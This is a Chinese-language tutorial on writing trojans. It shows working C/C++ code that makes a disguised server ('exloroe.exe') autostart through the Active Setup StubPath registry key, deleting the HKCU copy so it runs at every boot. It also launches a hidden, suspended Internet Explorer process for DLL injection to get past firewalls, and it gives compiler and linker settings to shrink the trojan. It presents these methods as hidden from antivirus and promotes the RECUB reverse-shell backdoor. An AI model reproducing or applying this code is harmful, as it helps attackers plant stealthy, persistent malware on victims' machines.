编程实现木马的ActiveX启动和注入IE的启动方式

1. 木马的启动方式有很多种，现在比较流行的就是注册为系统服务启动（只适合Windows 2000以上的系统），或者以驱动的方式启动。不过，最近以ActiveX方式启动又比较流行了,因为它适合Windows 9x或2000以上的机器，而且杀毒软件（比如瑞星、江民、金山等）基本不会去监视这种启动方式，比较隐蔽。以ActiveX方式启动的木马国外的比较多，于是就到网上查找相关代码，发现了RECUB。   
2. 　　其实RECUB是一个Windows平台的远程管理工具，其源代码已经为我们写的很清楚了，下面简要介绍一下RECUB。它能对Windows XP/2000/2003的反向连接Shell进行RC4加密；可以作为IE浏览器的实例启动并注入代码来绕过防火墙；通过加密的ICMP请求来激活；没有监听端口；没有可见进程，以注入Explorer.exe的方式启动和退出；可以通过ActiveX启动；退出Shell的时候没有事件日志；可以使用 nc得到远程Shell；EXE文件只有5.39K大小。怎么样，挺强的吧？下面我们就看一下它的部分代码，具体如下：   
3. //Active启动原理与代码   
4. 　　//初始化定义主键值   
5. 　　char regkey[MAX_PATH];   
6. 　　//定义服务端当前路径   
7. 　　char pathexe[MAX_PATH];   
8. 　　//子键的定义与初始化   
9. 　　HKEY childkey = 0 ;   
10. 　　//获取我们运行的服务端的当前路径   
11. 　　GetModuleFileName(NULL,pathexe,MAX_PATH);   
12. 　　//注册主键   
13. wsprintf(regkey,"%s%s","Software//Microsoft//Active Setup//Installed Components//",REGKEY);   
14. 　　//删除HKEY_CURRENT_USER相关的启动信息，这是ActiveX启动的关键   
15. 　　RegDeleteKey(HKEY_CURRENT_USER, ( LPCTSTR )regkey);   
16. 　　//创建AxtiveX启动信息，注册HKEY_LOCAL_MACHINE   
17. 　　RegCreateKey(HKEY_LOCAL_MACHINE, ( LPCTSTR )regkey, &childkey );   
18. 　　//把我们获取到的当前的路径复制给主键   
19. RegSetValueEx (childkey, ( LPCTSTR )"StubPath" ,0, REG_SZ, ( const BYTE* ) ( LPCTSTR )pathexe,lstrlen(pathexe)) ;   
20. 　　//关闭HKEY的对象   
21. 　　RegCloseKey (childkey);   
22. 　　   
23. 　　从以上的代码我们可以清晰地看到，ActiveX启动其实非常简单，仅仅是在HKEY_LOCAL_MACHINE下的Software// Microsoft//Active Setup//Installed Components//中注册一条信息就可以了。这条信息的键类似{36f8ec70-c29a-11d1-b5c7-0000f8051515}就可以。其实，我们可以随便的更改这些数字，只要不重复就可以了，而且我们还可以在这个键的下面新增一些子键和值（我们服务端的绝对地址）。   
24. 在上面的代码中有一个关键代码RegDeleteKey(HKEY_CURRENT_USER, ( LPCTSTR )regkey)，其作用是每次启动的时候清理HKEY_CURRENT_USER里面的信息。因为每当我们启动服务端的时候，系统都会自动在 HKEY_CURRENT_USER中注册一些HKEY_LOCAL_MACHINE中的信息，我们必须在程序中删除这些，否则我们的服务端也只能有一次的自启动机会。   
25. 　　根据上面的介绍，这里我就简单的写一段测试代码以供大家参考。启动VC，新建一个工程名称为test的Win32 Application，默认为一个简单的Win32程序，并假定我们的服务端是在系统目录system32中的exloroe.exe。其代码如下：  
26. #include "stdafx.h"   
27. int APIENTRY WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow)   
28. {   
29. // TODO: Place code here.   
30. HKEY hKey;   
31. TCHAR svExeFile[256] = "%SystemRoot%//system32//exloroe.exe";   
32. RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE//Microsoft//Active Setup//Installed Components//{H9I12RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}",&hKey);   
33. RegSetValue(hKey,NULL,REG_SZ,"系统设置",strlen("系统设置"));   
34. RegSetValueEx(hKey,"stubpath",0,REG_EXPAND_SZ,(BYTE *)svExeFile,lstrlen(svExeFile));   
35. RegCloseKey(hKey);   
36. return 0;   
37. }   
38. 　　这个最简单的程序就实现了在HKEY_LOCAL_MACHINE中注册ActiveX的过程。在程序退出的时候，我们可以编写下面的代码来清除HKEY_CURRENT_USER中的相关信息，以达到我们的程序启动的目的。   
39. 　　   
40. CreateThread(NULL,NULL,del,NULL,NULL,NULL); //ActiveX---   
41. DWORD WINAPI del(LPVOID lpParam)   
42. {   
43. RegDeleteKey(HKEY_CURRENT_USER,"Software//Microsoft//Active Setup//Installed Components//{H9I12RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}");    
44. return TRUE;   
45. }   
46. 下面我们再来看看DLL注入IE的木马的启动IE的方式。网上的开源代码很多，不过80%的注入文件都是explorer.exe，这个虽说比较简单，但很稳定。说它简单是因为它默认总是启动的，就不需要考虑它是否存在的问题。注入IE时，我们首先需要判断是否有iexplorer.exe的进程，如果没有，我们就需要找到iexplorer.exe所在的目录（一般都在C:/Program Files/Internet Explorer中，不过还是通过程序搜索最好，毕竟有好多网管把系统装在其他的盘符之中）。   
47. 记得自己刚刚写DLL程序的时候，启动IE的方式使用下面的代码：   
48. WinExec("C://Program Files//Internet Explorer//iexplore.exe -nohome",SW_HIDE);   
49. 　　也就是IE的空启动。用这种方法实现，虽然IE启动了，而且也挺隐蔽，但启动时就占用3000K的内存，这个是我们所不能接受的，我们希望程序启动能尽可能少的占用内存。后来在国外的一个站点上，我发现可以用下面的一种方法来启动，占用内存极小，其代码如下：   
50. //进程information   
51. 　　PROCESS_INFORMATION pi = {0};   
52. 　　//启动信息   
53. STARTUPINFO si = {0};    
54. //存储信息   
55. ZeroMemory(&si,sizeof(si));   
56. //信息的大小   
57. si.cb = sizeof(si);   
58. //相关信息   
59. si.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;   
60. 　　//隐藏启动   
61. si.wShowWindow = SW_HIDE;   
62. //隐藏   
63. pi.hProcess = SW_HIDE;   
64. //启动的主函数   
65. CreateProcess(    
66. NULL,    
67. //我们暂时就简单的默认IE在C://Program Files//Internet Explorer//iexplore.exe中   
68. "C://Program Files//Internet Explorer//iexplore.exe",    
69. NULL,    
70. NULL,    
71. 0,    
72. CREATE_SUSPENDED,    
73. NULL,    
74. NULL,    
75. &si,    
76. π   
77. );   
78. 最后我想说一下VC编译的优化处理问题。一是使用Release版而不用Debug版编译，因为使用Debug版编译会生成许多垃圾信息。使用 Release版编译的具体方法是在“build（编译）->Configuration（配置）”中，将“Win32 debug”移去，然后再次编译，就可以发现文件已经小了很多。二是设置自己的入口点函数。C或C++程序默认的入口函数是main()或WinMain ()，但我们现在不用Main和WinMain，因为这些都不是直接的入口点。编译器在产生exe文件的时候，将为我们生成真正的入口点。下面我们来定义自己的入口函数，具体方法是把main或WinMain改成其它的名字（如MyFun），打开“Project（工程）->settings（设置）”选项，选中“link”选项卡，在“Category（分类）”下拉列表中选“output”，在“Entry-Point symbol（输入项）”中输入我们刚才定义的入口函数（MyFun），在源程序中也要做相应修改。三是优化最小大小；四是输出，入口点改为MyDll （随便改啦）；五是连接，/align:40。   
79. 　　有了这些，基本上就能把我们的程序的体积减少很多，但每次这样的去设置，在编程的时候会很不方便，我们干脆直接写一个头文件（my.h），直接调用就少了很多的麻烦。下面是my.h的代码。   
80. // Version 1.00   
81. 　　// xgym   
82. 　　// May 20th, 1999   
83. 　　// [email]xgymcn@163.com[/email]   
84. 　　#ifdef NDEBUG   
85. 　　#pragma optimize("gsy",on)   
86. 　　#pragma comment(linker,"/RELEASE")   
87. 　　#ifdef _MERGE_RDATA_   
88. 　　#pragma comment(linker,"/merge:.rdata=.data")   
89. 　　#endif   
90. 　　#pragma comment(linker,"/merge:.text=.data")   
91. 　　#pragma comment(linker,"/merge:.reloc=.data")   
92. 　　#if _MSC_VER >= 1000   
93. 　　#endif   
94. 　　#endif   
95. 　　#pragma comment(linker,"/MERGE:.rdata=.data")   
96. 　　#pragma comment(linker,"/MERGE:.text=.data")   
97. 　　#pragma comment(lib,"msvcrt.lib")   
98. 　　#if (_MSC_VER < 1300)    
99. 　　 #pragma comment(linker,"/IGNORE:4078")    
100. 　　 #pragma comment(linker,"/OPT:NOWIN98")   
101. 　　#endif   
102. 　　#define WIN32_LEAN_AND_MEAN   
103. 　　   
104. 　　有了这个头文件，我们在编写服务端的时候，为了减少体积，直接“#include "my.h"”就可以了，这样就少了很多的步骤，而效果却是一样的。